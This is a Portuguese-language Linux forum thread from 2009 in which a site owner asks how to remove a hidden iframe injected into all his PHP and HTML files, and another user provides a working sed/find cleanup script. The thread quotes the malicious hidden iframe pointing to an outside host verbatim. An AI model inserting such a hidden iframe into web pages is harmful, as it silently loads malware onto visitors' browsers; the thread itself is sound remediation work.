Denuncie   Favoritos   Indicar  

invasão do site por malware [RESOLVIDO]

1. invasão do site por malware [RESOLVIDO]

jomar
jomartg
(usa CentOS)

Enviado em 20/09/2009 - 12:39h

Caros amigos,
Meu site foi invadido. Todos os arquivos php, html etc foram contaminados com a seguinte string: <iframe src="http://thingre.com/in.php" width="1" height="1"style="visibility:hidden;position:absolute"></iframe> antes do </body>

Como faço para apagar esta string de todos os arquivos onde esta string for encontrada, inclusive nos subdiretorios?
Meus conhecimentos no linux são básicos.
Agradeço antecipadamente.
Jomar


0 0
  • Quote

    •   


    2. MELHOR RESPOSTA

    kleber galucio
    klebrr
    (usa Linux Mint)

    Enviado em 20/09/2009 - 13:10h

    ============================
    =Faça um backup do seu site=
    ============================

    Crie um script bash "remove.sh"

    #!/bin/bash

    sed 's/<iframe\ src.*<\/iframe>//g' < "$1" > "$1.tmp"
    mv "$1.tmp" "$1"

    Depois use com o find

    find . -iname '*.php' | xargs -i ./remove.sh {} \;

    Obs: geralmente tem que adaptar algumas ER
    para que funcione.
    * não esquecer de tornar o script "remove.sh" executavel
    chmod +x remove.sh

    find . significa que vai procurar a partir de onde vc está, assim sendo é melhor que esteja na raiz de seu site juntamente com o arquivo "remove.sh"
    0 0
  • Quote

    • 3. Re: invasão do site por malware [RESOLVIDO]

    jomar
    jomartg
    (usa CentOS)

    Enviado em 20/09/2009 - 21:05h

    Caro Kleber,
    Fiz conforme sugeriu, mas não funcionou.
    A string não sumiu e o comando find não apresentou nenhuma mensagem de erro.

    0 0
  • Quote

    • 4. Re: invasão do site por malware [RESOLVIDO]

    kleber galucio
    klebrr
    (usa Linux Mint)

    Enviado em 20/09/2009 - 23:05h

    olha fiz o teste aqui e funcionou, confere abaixo:
    [root@teste]# ll
    total 16
    177 Set 20 21:57 index1.php
    177 Set 20 21:54 index2.php
    177 Set 20 21:56 index3.php
    79 Set 20 21:56 remove.sh*

    [root@teste]# find . -iname '*.php' | xargs -i ./remove.sh {} \;
    [root@teste]# ll
    total 16
    146 Set 20 21:57 index1.php
    146 Set 20 21:57 index2.php
    146 Set 20 21:57 index3.php
    79 Set 20 21:56 remove.sh*
    [root@teste]# cat index1.php
    <html>
    <head>
    <meta content="text/html; charset=ISO-8859-1"
    http-equiv="content-type">
    <title>kleber - teste</title>
    </head>
    <body>
    Teste de arquivo<br>
    </body>


    0 0
  • Quote

    • 5. Re: invasão do site por malware [RESOLVIDO]

    jomar
    jomartg
    (usa CentOS)

    Enviado em 20/09/2009 - 23:19h

    Agora funcionou, tinha um espaço em branco após o * no remove.sh (não sei como apareceu pois usei ctrl-c).
    Obrigado cleber.
    Site limpo.

    0 0
  • Quote





    • Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    Compartilhando a tela do Computador no Celular via Deskreen

    Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota

    Configuração para desligamento automatizado de Computadores em um Ambiente Comercial

    O mínimo que você precisa saber sobre o terminal (parte 2)

    O mínimo que você precisa saber sobre o terminal (parte 1)

    Dicas

    Como renomear arquivos de letras maiúsculas para minúsculas

    Imprimindo no formato livreto no Linux

    Vim - incrementando números em substituição

    Efeito "livro" em arquivos PDF

    Como resolver o erro no CUPS: Unable to get list of printer drivers

    Tópicos

    Mensagem quando tento fazer o apt update && apt upgrade no kal... (2)

    Melhores Práticas de Nomenclatura: Pastas, Arquivos e Código (0)

    O Micro Velho de Guerra! (5)

    Player para radio online (0)

    Modernização e Avanço do Linux. (22)

    Top 10 do mês

    Scripts

    [Python] Automação de scan de vulnerabilidades

    [Python] Script para analise de superficie de ataque

    [Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem

    [Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)

    [Shell Script] Script para adicionar bordas às imagens de uma pasta

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: